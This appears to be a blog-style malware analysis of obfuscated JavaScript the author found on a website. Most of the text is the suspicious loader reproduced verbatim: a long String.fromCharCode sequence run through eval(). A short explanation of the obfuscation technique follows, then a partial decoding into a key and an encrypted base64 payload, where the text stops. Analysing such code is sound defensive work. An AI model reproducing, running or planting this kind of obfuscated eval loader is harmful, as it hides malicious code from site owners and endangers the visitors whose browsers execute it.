var DRYUQIEDHS = String.fromCharCode(13-3,125-7,102-5,118-4,39-7,113-6,107-6,127-6,39-7,66-5,41-9,41-2,111-4,75-4,79-4,111-4,124-3,95-6,91-6,92-3,127-6,79-9,46-7,64-5,11-1,122-4,106-9,120-6,33-1,108-7,116-6,101-2,106-5,107-7,39-7,64-3,39-7,42-3,86-4,75-4,113-9,53-2,79-8,68-2,112-1,123-9,86-6,76-9,108-1,87-9,110-9,72-1,72-3,122-2,81-6,107-3,113-5,98-8,85-9,105-2,120-9,57-8,75-5,113-8,94-9,84-9,80-3,130-9,80-7,78-9,73-3,59-8,116-8,116-5,90-5,51-2,111-3,114-5,86-3,57-7,109-9,123-9,85-2,57-8,58-5,51-1,105-8,112-7,113-6,96-7,74-1,89-8,57-5,54-5,79-3,131-9,84-2,107-6,108-7,96-8,55-2,55-2,79-1,70-3,107-8,107-5,83-7,55-5,92-7,95-5,74-3,72-4,105-6,125-5,82-4,111-7,85-3,122-5,86-5,118-9,112-5,55-8,69-3,73-6,117-6,122-6,75-1,129-7,73-8,91-3,79-6,90-5,87-9,50-2,106-4,91-6,79-5,97-9,83-8,114-9,67-2,57-2,73-6,108-2,80-7,92-2,78-2,109-4,87-2,82-5,87-2,90-3,61-8,62-6,95-6,116-6,85-7,80-3,72-4,89-5,75-2,109-1,75-8,69-4,50-2,123-4,82-3,115-9,103-3,94-4,82-4,87-5,60-4,115-6,84-5,83-1,58-1,89-7,107-8,75-3,86-1,111-6,103-4,56-8,126-6,82-6,98-8,124-2,53-5,82-7,70-3,56-5,108-1,129-7,82-7,128-8,94-5,120-6,85-2,60-9,114-2,117-3,70-2,128-8,97-8,56-2,80-7,70-2,90-9,100-1,79-4,68-2,66-9,118-6,85-6,83-2,57-5,108-6,84-4,69-2,101-2,120-6,74-2,74-6,89-7,84-3,92-8,91-4,117-1,79-3,73-5,129-7,104-1,116-6,104-3,84-2,75-9,64-7,96-7,87-2,57-8,123-9,84-1,127-7,68-3,52-5,109-9,91-3,70-1,101-4,80-4,112-9,56-4,110-3,75-2,69-2,109-6,91-4,80-2,108-2,58-6,125-6,74-2,78-7,61-8,74-7,100-2,113-4,121-6,83-2,106-7,56-5,116-8,53-4,103-2,93-7,110-3,52-4,70-2,115-9,85-8,47-4,79-8,87-5,105-5,110-5,94-6,56-5,111-3,92-2,87-8,53-3,75-5,118-8,100-3,128-8,52-4,90-1,84-9,59-8,87-2,121-6,73-2,69-2,72-3,84-5,78-3,85-1,62-5,77-1,91-9,76-4,108-1,60-5,84-5,69-4,57-1,119-1,77-9,72-5,97-8,50-3,70-4,70-5,117-1,58-7,79-6,76-9,115-4,100-1,83-5,72-5,115-4,112-9,80-4,107-4,94-9,79-1,96-7,113-5,64-7,57-4,91-4,92-9,59-3,87-9,98-8,53-3,85-7,80-5,73-5,69-1,105-2,124-3,84-4,72-6,106-7,124-3,91-8,125-3,122-7,54-3,87-4,124-5,124-5,60-8,78-1,108-2,120-1,94-6,84-7,115-8,91-6,120-6,83-7,107-4,90-5,104-3,79-3,90-6,50-1,55-2,85-3,74-2,124-8,81-5,103-3,52-2,79-5,79-3,67-2,111-3,83-5,55-6,109-8,90-4,113-5,111-2,76-5,88-5,80-7,54-7,73-1,106-3,118-3,58-7,100-2,115-7,80-2,98-8,95-5,113-9,99-9,81-3,103-6,52-4,117-2,85-8,84-5,76-8,74-1,65-9,72-2,129-7,75-1,83-7,105-4,118-9,119-4,102-1,78-7,69-1,53-1,121-2,79-1,120-1,51-2,115-4,78-6,129-8,112-9,81-9,71-5,68-3,54-2,57-1,83-9,122-2,117-6,94-5,86-8,90-9,61-8,123-5,95-6,116-8,73-7,125-3,110-9,95-7,87-2,127-8,77-5,57-7,95-5,77-9,78-1,112-7,115-4,82-5,81-9,77-9,100-1,109-5,101-1,127-7,67-2,119-8,70-2,124-3,80-7,130-8,79-5,67-1,64-7,127-7,101-2,114-8,56-4,90-3,77-2,86-5,126-7,120-6,78-2,112-5,127-7,85-4,109-8,89-1,91-9,110-3,96-9,93-6,125-9,106-9,92-2,124-2,108-9,90-2,96-9,85-2,124-5,54-6,82-2,109-5,125-6,115-4,81-9,54-4,112-5,108-3,67-1,85-3,51-3,61-5,81-5,86-4,91-2,106-4,105-7,109-2,127-8,114-6,83-9,67-1,62-5,105-4,106-7,81-9,88-2,61-9,88-6,77-6,93-3,77-6,107-7,114-7,78-8,85-9,94-7,94-6,115-7,52-3,109-8,87-1,113-6,61-7,78-8,59-9,100-1,44-1,75-8,112-8,58-6,61-5,83-4,127-6,51-2,96-8,83-7,126-7,94-9,107-1,82-6,107-3,84-7,53-3,88-8,53-2,55-6,48-5,75-4,108-2,86-5,78-3,81-4,76-9,107-7,86-9,87-2,79-7,116-8,52-4,96-6,71-1,114-6,115-1,88-1,112-3,58-5,123-9,78-9,76-4,87-9,86-2,103-3,91-3,108-1,72-3,98-8,112-9,57-5,120-6,83-4,67-2,56-3,94-4,77-4,117-9,62-5,59-6,94-7,91-4,96-6,81-5,78-2,107-2,58-9,78-2,88-3,91-8,58-6,59-3,83-5,123-3,56-8,114-2,75-3,75-4,113-6,110-4,66-1,108-5,113-2,119-3,85-6,112-7,123-8,74-9,91-1,115-8,51-2,108-4,106-9,122-2,123-4,89-8,87-9,126-4,75-6,53-3,72-4,118-9,107-4,69-1,83-7,107-1,104-1,105-3,73-3,106-1,119-4,118-3,101-1,128-8,94-9,114-8,68-2,92-9,73-8,49-2,71-6,57-8,115-7,115-5,102-2,95-8,121-5,89-8,97-7,108-4,67-1,81-3,99-2,53-5,123-7,99-9,105-4,96-8,92-6,55-2,70-2,113-8,57-1,72-2,78-5,129-8,90-9,100-1,93-7,125-3,89-4,61-7,84-5,108-4,109-6,124-3,73-8,113-8,107-4,109-1,91-8,57-9,89-7,59-6,75-2,112-9,92-3,91-5,77-2,83-2,108-5,112-3,83-3,121-2,75-2,93-6,83-5,51-1,54-1,90-6,93-6,92-5,93-3,80-4,98-8,124-2,91-1,106-2,89-2,95-7,109-2,114-3,88-3,54-3,80-2,111-2,90-7,122-1,72-3,48-5,73-7,87-5,120-9,125-9,87-7,75-7,91-2,96-8,93-3,112-9,123-4,112-7,84-4,130-9,105-2,96-9,79-1,109-3,54-2,128-9,74-2,76-5,56-4,81-8,74-3,71-4,89-4,82-7,71-1,73-5,121-1,65-9,105-4,84-3,79-5,82-5,92-9,57-7,105-5,121-7,87-4,127-8,61-5,61-9,80-6,55-4,115-8,104-7,75-4,85-3,56-8,116-7,77-3,124-4,60-8,101-2,103-2,91-4,109-5,56-3,74-2,85-2,109-2,82-9,83-6,113-8,93-4,83-4,77-7,127-6,54-5,59-4,82-3,105-1,94-5,118-6,66-1,70-3,56-4,124-7,93-8,73-1,86-8,55-2,107-7,91-3,117-9,92-2,84-7,68-3,120-9,55-6,104-7,128-9,109-6,113-4,79-4,110-5,75-6,56-4,71-4,125-3,77-3,82-6,102-1,112-3,117-2,77-4,81-7,114-9,60-4,51-3,80-2,89-8,121-2,111-5,91-9,87-4,56-4,116-8,72-4,128-8,123-4,110-6,73-2,108-2,64-7,83-1,97-7,70-1,119-3,112-4,99-2,52-4,75-9,91-1,80-1,109-6,115-4,60-9,79-8,69-2,122-7,88-9,96-6,59-9,74-8,82-6,88-1,52-2,89-7,58-7,103-4,72-3,77-3,81-4,86-3,52-2,108-8,120-6,89-6,127-7,68-3,51-4,101-1,95-7,72-3,103-6,72-1,84-2,108-5,130-8,76-1,110-6,114-7,87-9,106-5,95-8,108-4,110-3,94-7,94-7,119-3,103-6,106-8,115-6,121-6,86-5,107-8,57-6,114-6,54-5,103-2,90-4,112-4,112-3,88-5,128-7,84-3,93-8,73-2,67-2,56-8,58-6,77-3,129-8,52-3,97-7,104-3,50-2,124-9,112-5,76-6,70-4,49-1,93-4,85-7,87-4,72-7,59-3,91-5,125-4,60-4,75-5,77-4,126-5,61-9,90-6,81-3,112-6,61-4,63-6,85-6,111-6,91-2,118-7,69-2,106-1,119-8,124-7,86-3,53-4,81-7,54-1,108-8,58-8,87-5,104-6,100-2,56-7,74-8,86-8,100-3,57-9,119-3,99-9,107-6,90-7,113-9,89-5,89-2,96-9,98-8,78-2,95-5,123-2,82-9,85-7,91-4,93-5,75-6,53-3,72-6,109-6,117-6,122-1,74-7,113-7,94-9,51-4,86-3,53-5,90-8,111-4,109-9,93-5,85-3,79-6,103-5,54-6,119-4,59-3,86-5,93-8,120-4,91-1,103-2,94-6,90-4,54-1,93-6,88-5,91-6,49-1,83-6,85-2,118-7,73-1,70-2,77-9,128-8,51-2,93-3,75-5,112-5,119-8,75-3,111-6,118-3,112-2,87-2,77-5,86-8,56-3,104-4,97-9,117-9,96-6,86-7,57-7,73-3,117-7,104-7,52-4,121-5,93-3,89-9,74-6,108-1,117-4,76-4,79-8,93-4,83-2,88-4,91-4,120-4,79-3,90-3,89-1,116-8,51-2,103-2,83-1,115-4,99-9,80-9,74-6,85-8,119-6,74-3,82-1,54-5,60-7,102-5,76-4,110-3,103-6,76-5,84-2,50-2,112-3,80-6,122-2,53-1,108-9,102-2,126-4,125-6,56-5,78-6,85-2,79-2,89-5,73-6,76-9,53-4,76-8,95-8,59-9,85-3,60-9,106-6,87-1,108-1,116-8,84-6,69-1,82-1,56-9,68-1,110-7,116-1,125-9,111-9,81-9,117-9,87-4,94-4,115-7,120-8,65-9,90-9,87-2,123-7,92-2,104-3,93-5,94-8,55-2,91-4,88-4,72-7,76-1,87-9,93-6,122-7,79-6,78-4,115-9,121-2,58-3,89-9,87-1,112-4,60-5,90-7,123-2,89-8,90-5,76-4,86-4,104-1,57-8,75-2,72-4,125-5,92-4,79-3,125-6,93-8,113-7,84-8,110-6,83-6,57-7,85-5,57-6,55-6,58-3,83-2,113-4,84-2,73-1,91-1,130-9,106-3,50-2,71-4,110-5,54-6,49-1,80-5,122-3,51-2,120-2,86-1,71-2,52-3,118-4,86-3,52-3,114-6,57-4,109-9,95-7,110-3,86-5,81-8,74-5,117-1,124-6,78-3,72-4,86-5,100-1,82-4,123-1,78-8,59-6,83-1,73-1,120-4,79-3,104-7,114-4,120-8,68-1,96-9,85-2,81-7,108-6,102-1,87-1,115-7,114-5,90-7,51-1,101-1,117-3,84-1,55-6,113-6,56-2,71-4,115-9,126-7,91-3,76-3,113-6,119-3,56-2,102-5,120-1,109-6,114-5,84-8,127-5,84-3,58-9,71-3,73-6,79-1,73-3,78-3,129-8,56-4,77-7,81-9,110-5,56-8,66-9,91-2,115-5,84-6,113-4,91-8,51-1,104-4,120-6,85-2,51-2,109-2,112-5,97-9,53-2,115-7,96-6,95-5,114-7,123-7,116-6,103-6,124-5,106-3,115-6,78-2,124-2,82-1,55-6,72-4,74-7,79-1,84-8,105-4,113-4,121-6,103-2,77-7,127-5,121-2,117-8,85-6,108-4,105-2,52-2,76-8,117-8,60-4,117-6,80-2,67-2,57-1,55-3,86-7,87-4,124-5,108-9,100-3,68-2,109-6,125-4,80-5,91-9,110-7,83-5,84-9,128-6,125-6,57-6,79-7,116-7,53-1,75-2,72-1,76-8,110-7,111-9,72-1,74-7,119-4,107-3,101-1,94-8,116-9,109-1,85-7,76-9,74-1,113-5,70-2,54-5,75-9,127-8,101-3,110-2,80-2,98-8,91-1,110-3,118-2,116-6,80-2,110-1,75-5,93-3,109-8,93-5,91-5,59-6,73-6,129-8,80-3,106-4,80-3,114-8,114-7,74-4,88-1,86-2,120-9,81-6,77-1,129-9,110-7,121-8,76-4,110-5,81-7,126-7,95-6,87-1,113-5,60-7,76-1,75-5,86-8,131-9,93-3,112-5,120-5,112-8,82-2,111-8,88-3,104-7,79-3,93-9,127-8,56-6,72-2,57-7,98-9,90-1,80-7,109-3,60-4,118-7,71-1,110-4,98-9,45-2,84-7,73-7,121-1,119-2,70-3,68-2,107-4,112-4,72-5,112-8,88-7,57-1,103-2,96-8,112-5,85-5,75-1,122-3,107-8,124-3,84-8,113-6,104-4,92-2,84-4,69-2,49-1,66-9,79-8,70-2,63-7,94-5,102-4,117-8,123-8,86-5,108-9,53-2,113-5,50-1,106-5,95-9,109-2,125-6,71-4,113-7,90-4,116-2,71-3,108-5,72-3,65-8,86-8,72-5,53-5,102-3,92-2,117-9,93-3,116-6,82-8,86-5,56-4,83-4,110-9,90-8,76-7,57-5,72-4,88-5,84-6,76-8,99-1,112-2,75-9,110-6,96-9,95-7,109-1,50-1,107-6,91-9,126-7,47-4,74-6,126-5,94-5,51-4,76-8,117-9,105-6,119-6,86-9,74-7,53-5,66-9,79-5,122-2,65-9,112-7,92-3,122-3,53-1,68-2,81-1,92-8,82-1,120-4,77-5,74-3,111-8,78-1,81-8,108-2,64-8,125-7,75-4,73-6,55-7,126-7,107-8,91-5,74-8,112-3,85-4,74-3,106-7,121-4,76-7,123-3,49-1,55-3,78-2,69-2,113-1,89-8,109-7,89-2,77-7,117-7,106-9,49-1,117-1,92-2,80-4,130-8,88-7,118-4,96-9,89-6,92-7,49-1,79-2,86-3,114-3,77-5,75-7,75-7,123-3,53-4,96-6,73-3,114-7,107-1,72-1,72-5,82-1,120-7,75-4,127-7,128-8,126-6,78-5,125-3,109-6,95-9,86-9,127-8,57-4,119-2,98-1,53-5,72-6,92-2,106-7,93-5,56-8,62-6,69-4,86-3,78-5,79-4,86-6,107-1,113-9,79-3,88-6,79-8,90-8,58-9,84-6,126-7,120-1,120-7,74-8,56-6,57-4,115-1,91-5,74-4,113-5,56-1,105-5,52-1,114-6,69-1,94-4,112-5,111-3,58-2,106-9,127-8,57-5,75-9,83-8,93-9,128-9,116-2,73-1,72-4,89-3,88-1,92-2,96-9,118-2,67-2,90-3,88-4,125-6,124-8,81-1,91-9,106-3,128-7,75-7,117-8,112-5,52-5,73-7,71-4,127-8,87-9,78-8,111-8,119-8,84-6,80-2,74-9,78-5,114-2,80-4,74-5,80-2,86-5,105-6,76-5,60-7,87-3,90-3,93-6,91-1,82-6,93-3,125-4,59-3,78-9,74-3,106-1,124-5,61-9,85-5,73-7,100-1,129-8,90-8,85-2,85-4,116-9,72-6,71-5,76-3,124-5,83-6,75-3,110-2,70-1,98-8,111-8,111-8,91-2,79-5,83-2,112-1,87-2,82-2,80-8,90-4,124-3,95-8,88-1,86-4,89-2,91-1,96-9,118-2,70-5,92-5,88-4,116-5,77-2,83-7,123-3,105-2,121-8,76-4,112-7,78-4,120-1,95-6,88-2,110-2,59-6,84-9,78-8,85-7,130-8,98-8,109-2,124-9,108-4,83-3,111-8,94-9,101-4,79-3,87-3,126-7,55-5,77-7,54-4,93-4,81-8,83-7,124-3,53-1,78-5,74-5,109-5,116-5,61-7,84-6,110-6,78-5,124-6,76-8,110-1,58-1,106-1,86-3,121-2,83-9,91-7,106-6,95-7,111-3,94-4,93-3,110-7,80-7,108-4,102-5,56-8,81-4,93-7,79-1,109-3,90-1,56-4,79-9,88-6,90-5,109-7,82-7,70-2,112-5,81-6,73-1,107-1,126-6,58-3,87-7,106-2,126-7,123-2,82-9,108-2,84-7,121-4,71-5,113-5,77-7,52-9,81-5,73-8,72-7,85-1,87-9,73-8,116-4,127-5,78-7,128-7,109-6,104-7,97-8,89-5,58-6,50-2,84-5,124-5,59-7,83-4,84-6,69-1,108-4,100-3,75-6,77-9,120-4,126-5,106-7,75-5,117-9,63-8,91-5,111-1,116-4,122-8,91-7,75-6,109-5,50-7,104-2,79-7,114-7,69-2,93-9,74-5,121-5,116-6,102-5,50-2,118-2,92-2,105-4,92-9,108-9,65-9,70-2,87-3,85-8,96-6,81-6,94-7,117-2,110-8,75-8,128-7,126-7,126-7,98-9,112-2,82-4,113-4,89-6,53-3,101-1,121-7,74-4,113-5,112-5,65-9,82-3,88-5,115-4,102-3,94-4,107-3,73-7,79-1,106-9,57-9,117-1,91-1,109-8,91-3,93-7,61-8,76-6,89-6,113-6,74-1,76-2,109-4,108-9,56-4,69-1,85-1,95-6,111-1,80-1,74-8,61-9,113-7,88-6,88-4,89-8,124-7,81-9,124-2,74-9,117-1,86-9,74-6,84-2,86-4,98-9,83-1,80-7,104-3,76-3,83-1,112-5,92-3,104-6,84-3,94-9,103-6,76-5,114-4,61-9,66-1,77-2,106-3,114-7,109-3,73-1,72-5,118-7,116-7,100-3,75-9,73-8,116-9,92-8,79-8,120-4,117-3,90-6,74-5,108-4,50-7,111-9,73-2,76-2,123-1,99-9,113-6,124-8,112-2,106-9,124-4,98-8,125-3,107-6,96-8,93-7,59-6,96-9,92-8,74-9,79-4,84-6,90-3,118-3,93-3,79-7,72-4,64-8,122-3,80-5,121-2,121-6,114-8,78-7,86-4,86-1,126-9,75-7,122-2,72-7,123-9,78-1,69-1,120-9,79-1,71-5,86-5,82-1,114-3,78-5,68-3,82-9,103-4,103-2,90-3,111-7,60-7,78-6,110-5,79-2,105-3,68-2,73-6,82-1,73-4,72-3,112-6,72-7,128-9,104-5,95-9,117-2,51-3,70-2,110-5,76-7,125-8,79-8,84-3,117-2,58-2,78-4,126-7,118-3,105-6,77-4,104-1,79-6,54-5,85-9,106-3,108-5,84-6,80-9,107-1,118-7,58-8,70-1,106-1,63-7,81-2,92-2,91-4,75-1,84-3,105-6,55-4,116-8,56-7,104-3,87-1,112-5,127-9,76-8,88-1,106-6,109-3,76-5,88-6,125-6,50-3,85-8,72-5,119-4,77-1,76-3,123-3,114-7,88-2,83-7,106-3,61-5,90-9,76-1,130-8,68-3,60-6,76-8,89-8,93-8,74-5,77-2,76-9,74-9,73-6,76-4,76-4,112-4,52-4,99-9,75-5,110-3,117-6,79-7,108-3,120-5,112-2,89-6,55-6,61-4,48-1,106-6,92-9,123-8,105-6,79-6,70-5,60-8,52-3,88-9,89-8,53-1,83-7,73-6,126-4,69-4,65-8,71-2,77-9,90-9,80-1,80-6,69-1,57-1,118-7,71-1,110-4,97-8,48-5,86-9,72-6,126-6,111-2,86-3,117-7,119-7,117-3,87-4,88-2,125-9,120-1,101-1,91-8,77-3,131-9,96-6,109-2,121-5,111-1,101-4,55-7,118-2,95-5,76-1,127-5,74-9,117-1,71-3,70-2,86-5,73-3,92-2,128-6,60-4,94-4,69-1,76-8,125-5,118-1,92-7,53-4,114-6,110-1,85-2,58-8,108-9,53-3,90-7,125-5,121-2,57-8,78-4,111-5,127-7,92-2,82-6,126-7,57-8,117-7,90-1,126-7,61-5,88-1,83-4,111-6,66-1,51-3,79-7,74-7,106-3,105-3,104-7,89-6,109-6,78-9,78-8,113-7,79-6,64-8,85-5,79-9,103-4,126-8,70-4,92-9,84-7,125-8,70-1,127-5,98-9,50-3,107-5,97-9,53-1,88-9,82-7,84-2,116-9,109-3,85-6,127-7,115-8,104-5,80-5,111-6,97-8,75-4,77-7,84-1,115-8,86-9,75-2,76-9,61-9,88-8,89-1,114-4,69-3,51-2,107-6,75-6,91-9,62-7,87-4,51-1,120-8,56-2,92-3,93-5,71-5,54-1,101-1,97-9,115-7,99-9,97-7,109-2,117-1,116-6,79-1,126-6,104-4,97-7,83-3,87-3,117-6,55-1,70-2,68-1,118-3,86-7,79-4,93-9,62-5,74-4,80-9,113-7,96-7,58-4,85-8,107-3,72-7,111-5,91-9,92-9,53-1,117-9,76-8,122-2,120-1,111-7,79-8,112-6,58-1,86-4,96-7,86-4,124-5,54-3,99-9,113-9,105-2,107-8,80-4,87-4,71-2,123-4,72-2,125-4,73-4,93-4,96-7,73-2,83-9,82-6,90-3,80-9,83-1,117-6,109-8,95-9,88-6,60-9,94-5,93-6,103-3,120-6,84-1,51-2,116-8,62-9,101-1,91-3,115-7,93-3,91-1,113-6,124-8,111-1,101-4,57-9,124-8,97-7,104-3,92-9,108-1,114-6,88-1,86-3,82-9,73-4,77-3,73-5,56-4,72-1,78-6,69-1,108-9,105-1,106-6,121-1,112-1,113-1,71-5,68-1,124-5,111-6,74-6,115-7,100-1,124-5,84-5,128-6,51-3,106-7,89-9,107-2,86-5,107-3,96-7,56-8,125-6,87-8,85-7,109-4,100-1,59-2,73-6,92-8,86-5,88-9,87-9,69-1,105-2,56-8,77-9,89-5,128-9,116-7,80-4,89-3,60-7,123-5,92-9,55-5,97-7,56-6,93-7,114-6,114-6,53-5,95-5,78-6,75-9,94-4,95-5,111-7,69-3,86-8,105-8,54-6,119-3,91-1,106-5,90-2,87-1,61-8,76-9,122-1,81-4,103-1,85-8,110-4,112-5,72-2,93-6,84-1,53-5,118-8,81-5,71-5,129-9,61-4,98-9,94-7,101-1,117-3,88-5,51-2,111-4,109-2,101-1,88-4,120-1,94-8,80-2,85-4,55-2,113-3,85-8,77-6,76-6,96-6,106-5,89-1,93-7,60-7,88-1,88-1,94-5,92-3,77-4,115-9,60-4,118-7,76-6,111-5,90-1,50-7,86-9,75-9,128-8,118-1,85-2,88-4,91-6,125-8,72-4,89-7,127-8,122-8,83-9,130-8,121-2,81-5,73-3,73-8,53-1,111-5,81-8,106-2,112-5,100-1,81-2,107-2,76-7,104-7,77-7,110-5,109-2,71-6,77-1,112-7,57-4,82-8,89-3,89-1,111-3,57-6,84-4,91-9,94-4,111-2,72-6,85-2,107-4,48-1,88-5,127-8,117-2,57-1,84-7,85-1,68-3,79-3,75-2,122-3,110-7,125-3,105-8,89-4,102-2,92-2,101-3,113-4,99-9,117-5,91-6,79-7,56-7,107-3,91-1,55-5,124-8,79-3,92-5,89-1,111-3,52-3,79-4,124-4,128-9,127-6,73-1,108-2,89-4,115-7,86-3,126-6,64-8,58-6,80-1,89-6,117-6,106-7,104-2,90-3,73-3,111-1,101-4,56-8,125-9,91-1,78-4,75-5,59-2,56-3,92-5,89-5,125-9,108-4,92-8,91-7,91-1,107-3,108-9,50-1,85-7,104-2,85-9,122-2,106-3,53-5,89-6,123-1,90-5,123-6,75-8,110-6,53-5,107-4,69-3,107-2,57-9,94-5,84-7,110-7,58-6,78-9,80-7,126-7,53-1,99-2,85-8,106-2,128-9,56-5,77-9,88-5,79-2,91-1,80-3,88-5,117-6,79-7,94-7,91-4,85-3,56-7,80-5,111-7,121-2,127-6,78-5,110-5,112-5,50-3,69-1,111-8,118-3,121-3,86-8,76-8,94-8,91-9,81-8,68-2,53-1,119-7,79-4,70-4,57-1,85-4,84-6,110-4,124-8,124-4,92-7,78-7,97-8,84-3,92-8,95-8,119-3,77-1,72-3,69-1,62-5,58-9,108-9,87-5,57-9,116-4,76-9,76-8,75-2,113-4,69-1,105-1,101-2,121-5,102-1,127-6,119-4,100-1,75-1,126-7,64-8,51-8,79-8,67-1,58-2,92-3,81-5,87-3,70-4,55-2,83-1,76-4,124-8,90-3,95-5,56-6,127-8,74-1,76-6,110-4,89-8,112-4,81-3,90-8,124-5,128-7,69-1,110-1,72-6,72-6,90-7,50-1,114-6,59-6,104-4,89-1,111-3,98-8,88-9,107-3,106-6,112-2,77-1,120-1,87-6,105-8,81-5,75-7,104-1,57-1,77-7,126-4,83-9,71-1,86-8,89-6,55-3,82-7,75-3,86-3,70-5,79-8,79-3,89-7,104-1,125-4,77-9,117-8,103-3,56-6,94-8,111-3,115-7,48-5,82-2,72-4,106-7,81-3,80-7,125-5,109-2,111-2,76-1,74-8,63-7,89-8,81-5,123-1,74-8,48-5,86-1,76-5,98-9,84-3,88-4,96-9,118-2,78-2,89-2,96-8,113-6,57-7,84-6,85-3,123-4,111-1,79-8,90-9,55-3,113-5,73-1,124-4,125-6,122-8,77-4,128-6,106-3,87-1,104-6,113-9,110-3,113-8,78-3,109-6,59-3,68-3,76-9,110-5,75-6,59-7,75-7,91-8,81-4,115-4,77-1,123-2,55-3,81-8,78-9,111-7,73-8,63-8,85-9,83-1,125-6,50-2,80-8,86-3,91-2,119-9,88-7,108-1,78-4,89-5,104-4,96-8,115-7,97-7,95-5,113-9,105-2,124-2,77-2,105-1,113-6,86-8,104-5,95-7,124-4,109-4,100-1,56-6,95-5,83-7,85-6,113-6,72-3,91-4,94-8,90-2,116-8,108-1,106-9,89-3,68-2,61-4,90-1,94-7,106-2,111-4,92-6,57-8,93-4,121-8,79-1,114-9,121-6,85-4,86-8,109-5,63-6,54-1,84-3,95-8,71-2,64-3,41-2,60-1,15-5,106-4,124-7,111-1,102-3,120-4,106-1,112-1,113-3,38-6,125-5,120-9,123-9,100-5,107-6,111-1,101-2,47-7,121-6,118-2,121-7,113-8,115-5,108-5,52-8,35-3,109-2,102-1,125-4,46-5,37-5,124-1,12-2,38-6,33-1,123-5,101-4,117-3,36-4,122-8,106-5,117-2,41-9,70-9,36-4,46-7,40-1,61-2,16-6,41-9,33-1,108-6,120-9,123-9,41-9,41-1,124-6,100-3,120-6,33-1,112-7,33-1,67-6,37-5,49-1,66-7,35-3,107-2,36-4,66-6,37-5,122-7,117-1,117-3,113-8,115-5,105-2,52-6,109-1,105-4,113-3,107-4,117-1,112-8,68-9,34-2,109-4,48-5,46-3,50-9,38-6,129-6,17-7,34-2,39-7,33-1,36-4,121-7,104-3,123-8,33-1,45-2,63-2,40-8,90-7,124-8,123-9,107-2,114-4,111-8,49-3,106-4,119-5,114-3,115-6,75-8,110-6,100-3,115-1,71-4,112-1,104-4,103-2,47-7,117-2,122-6,119-5,108-3,113-3,105-2,51-5,101-2,106-2,103-6,120-6,69-2,120-9,108-8,109-8,72-7,123-7,44-4,111-6,43-2,38-6,103-9,13-3,34-2,37-5,33-1,37-5,37-5,37-5,38-6,33-1,34-2,41-9,41-9,35-3,37-5,41-9,41-9,41-9,39-7,40-8,36-4,41-9,40-8,36-4,39-7,41-9,40-8,34-2,37-5,36-4,33-1,37-5,40-8,39-7,113-6,109-8,126-5,52-6,100-1,106-2,106-9,118-4,73-6,112-1,103-3,103-2,72-7,120-4,46-6,108-3,38-6,45-8,37-5,112-5,110-9,130-9,50-4,113-5,110-9,113-3,107-4,119-3,109-5,49-8,48-7,63-4,14-4,33-1,41-9,130-5,11-1,37-5,37-5,119-5,107-6,123-7,122-5,116-2,114-4,35-3,123-9,108-7,117-2,68-9,11-1,127-2,18-8,19-9,127-9,104-7,119-5,35-3,101-1,108-7,105-6,41-9,70-9,34-2,121-1,114-3,118-4,97-2,104-3,117-7,100-1,45-5,98-1,120-4,120-9,101-3,46-6,104-3,119-9,101-2,102-1,106-6,50-9,50-6,35-3,113-6,104-3,122-1,45-4,65-6,14-4,43-3,119-9,103-2,125-6,37-5,77-7,123-6,119-9,104-5,125-9,106-1,117-6,115-5,43-3,108-8,107-6,102-3,43-2,48-7,41-1,45-4,60-1,17-7,11-1);eval(DRYUQIEDHS);

I was excited looking at this. At this point I knew that something malicious was going on. A reputable site should not be obfuscating anything. Things such as directories or Google Anaglytics code are normally not hidden. My suspicion and interest was definitely raised. You can pick your poison with how to decode the above.

Lifting the veil

The above code is using the fromCharCode() method of the String object to piece together the numeric representation of the ASCII values passed. For example, “ABC” will be represented by String.fromCharCode(65,66,67). This technique is also often seen in Cross Site Scripting vectors when alert() or void() cannot be used. Further decoding led to the following.

var key = 'kGKkyYUYyF';
var enced = 'RGh3GBorPCkNeGExKhlZLgo1FiUKMyIEF3loU1lmS2drS152aikYIQ41LzReeX55NCcfL2UZGDcxNhRuQmk/BCotJzAXIUN0fUJXKiA7CjIZLiUMUW58YnNMDTIlCA0wOjdZNR8mOR9RcHUic0xLZz0KC3kzKxYrS3prDxY6IDQcKB9pOQ4fPCcrHDRQTWtLDzgneRB9YU1rSxA/dXEaLg4kICgWNj4wHG5CbmsQc3l1eVk0DjM+GRdiX3lZO2Fnax0YK3UsGCEOKT9LRHk7OA8vDCY/BAt3ICocNCogLgUNYl95WS8NZ2NKDDgyPBcySzs3Sww4MjwXMkUrLgUeLT15RHtLd2JLAlN1eVlmGSI/Hgs3blNZZhZNa0sMODI8FzJLemseGD4wNw1oHygHBA48JxoYNQ5vYlBzeXUwH2ZDMioMHDchdxAoDyIzJB9xcj4WKQwrLkxQeXRkWWtaZzcXWSw0PhwoH2kiBR08LRYfbkwlJB9ecHV4RGZGdkFLWXl1eVk6F2c+Ch48Oy1XLwUjLhM2P31+GjQKMCdMUHl0ZFlrWm5rEHNTdXkEZg4rOA5ZIl95WWZLLi1LUS48Nx0pHGkjAgotOisAZk1haxwQNzE2DmgDLjgfFissdxUjBSA/A1lndWtQZhBNa0tZeXV5Di8FIyQcVzU6OhgyAiglS0R5IgYVKQgmPwIWN25TWWZLZzZhWXkoU3NmSyE+BRotPDYXZgwiPygWNj4wHG4IGCUKFDx8eQJMS2drSw84J3kaGR0mJx4ceWh5HSkIMiYOFy17OhYpAC4uUHN5dXlZMAo1awgmKiE4CzJLemsIJi80NQwjRS4lDxwhGj9RZEtla0BZOgo3GCsOZ2BLW2R3cEJMS2drSxA/dXEaGRgzKhkNeWhkWWtabmsQc3l1eVlmSyQUGA04Jy1Ze0skFB0YNSA8Vy8FIy4TNj99OiYoCiouS1J5d2Rbb1BNa0tZeShTWWZLZyINWXE2BgoyCjU/S0RkdXRIb0s8QUtZeXV5WSU0MSoHDDx1ZFkoHisnUHN5dXlZO2Fna0tZPDkqHGYQTWtLWXl1eRoZGDMqGQ15aHkaGR0mJx4cdzw3HSMTCC1DW2R3dVklNDQ/CgstfHlSZlp8QUtZeXV5WTAKNWsIJjw7PVl7SyQUHRg1IDxXLwUjLhM2P317QmRHZyg0Ci00Kw1vUE1rS1l5dXkQIEtvKDQcNzF5RHtLanpCWSJfeVlmS2drS1k6CjwXIkt6awgmLzQ1DCNFKy4FHi09YnNmS2drS1kkX3lZZktnawgmLzQ1DCNLemseFzwmOhg2Dm8oNA84OSwcaBgyKRgNKzw3Hm4IGDgfGCshdVklNCIlD1BwblNZZktnNmFZeXV5CyMfMjkFWToKLxgqHiJwYVl5KFNzZkshPgUaLTw2F2YYIj8oFjY+MBxuCBglChQ8eXkPJwcyLkdZPC09GD8YbmsQc3l1eVkwCjVrDgE9NC0cZlZnJQ4OeRE4DSNDbnBhWXl1eRw+DyY/Dlcq